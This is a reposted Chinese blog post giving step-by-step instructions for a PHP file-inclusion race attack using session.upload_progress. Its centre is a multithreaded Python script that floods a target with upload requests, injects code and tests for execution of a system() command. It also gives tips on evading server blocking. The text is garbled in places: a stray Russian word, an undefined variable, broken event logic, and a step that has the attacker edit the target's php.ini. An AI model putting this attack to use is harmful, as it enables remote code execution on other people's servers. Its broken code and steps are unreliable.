博客
关于我
利用session.upload_progress进行文件包含
阅读量:789 次
发布时间:2019-03-25

本文共 1715 字,大约阅读时间需要 5 分钟。

为了避开Web服务器的目录traversal防护,我们可以利用PHP会话上传功能进行条件竞争。以下是实现攻击的详细步骤:

  • 禁用自动清理会话文件

    • 修改php.ini,设置session.upload_progress.cleanup为0,这样在HTTP请求结束后不会自动删除会话文件。
  • 编写注入木马

    • 创建一个简单的PHP脚本,利用PHP_SESSION_UPLOAD_PROGRESS参数注入恶意代码。例如:
    • 将此脚本作为文件请求 отправ到目标服务器。
  • 自动化发送请求

    • 使用Python编写脚本,利用多线程和事件来发送大量请求,提高攻击成功率。例如:
      import ioimport requestsimport threadingimport timesessid = 'dummy_session'data = {    'cmd': 'system("echo hello;")'}global eventevent = threading.Event()def write_session():    while True:        f = io.BytesIO()        requests.post(            'http://target.com/session.php',            data={'PHP_SESSION_UPLOAD_PROGRESS': raw_input_evil_code},            files={'file': ('malicious.php', f)},            cookies={'PHPSESSID': sessid}        )        time.sleep(0.5)def read_response():    while True:        try:            response = requests.post(                'http://target.com/session.php?file=/some/path',                data=data,                cookies={'PHPSESSID': sessid}            )            if 'hello' in response.text:                print("Injection successful!")                event.clear()            else:                print("Trying again...")        except:            print("Error, retrying...")            time.sleep(1)with requests.Session() as session:    for _ in range(100):        threading.Thread(target=write_session).start()    for _ in range(100):        threading.Thread(target=read_response).start()    event.wait()
  • 处理异常并保持会话状态

    • 在多次尝试时,使用重试策略,如随机等待时间和指数重试,避免被服务器封锁。
    • 使用global变量或类似机制管理事件,确保攻击未完成时不提前停止。
  • 效果验证

    • 在目标服务器中查找新的会话文件。
    • 在响应中查找注入代码的执行结果,如确认木马成功执行的日志或终端输出。
  • 注意

    • 攻击行为可能触犯法律法规,请谨慎实施。
    • 了解服务器的防护机制,如IP封锁、速率限制等。
    • �.IT安全基础知识的缺口可能导致攻击失败,建议深入学习。

    通过以上步骤,可以尽量提高攻击的成功率,但仍需考虑目标服务器的安全措施和潜在的检测机制。

    转载地址:http://klouk.baihongyu.com/

    你可能感兴趣的文章
    MQTT工作笔记0007---剩余长度
    查看>>
    MQTT工作笔记0009---订阅主题和订阅确认
    查看>>
    Mqtt搭建代理服务器进行通信-浅析
    查看>>
    MS Edge浏览器“STATUS_INVALID_IMAGE_HASH“兼容性问题
    查看>>
    ms sql server 2008 sp2更新异常
    查看>>
    MS UC 2013-0-Prepare Tool
    查看>>
    MSBuild 教程(2)
    查看>>
    msbuild发布web应用程序
    查看>>
    MSB与LSB
    查看>>
    MSCRM调用外部JS文件
    查看>>
    MSCRM调用外部JS文件
    查看>>
    MSEdgeDriver (Chromium) 不适用于版本 >= 79.0.313 (Canary)
    查看>>
    MsEdgeTTS开源项目使用教程
    查看>>
    msf
    查看>>
    MSSQL数据库查询优化(一)
    查看>>
    MSSQL数据库迁移到Oracle(二)
    查看>>
    MSSQL日期格式转换函数(使用CONVERT)
    查看>>
    MSTP多生成树协议(第二课)
    查看>>
    MSTP是什么?有哪些专有名词?
    查看>>
    Mstsc 远程桌面链接 And 网络映射
    查看>>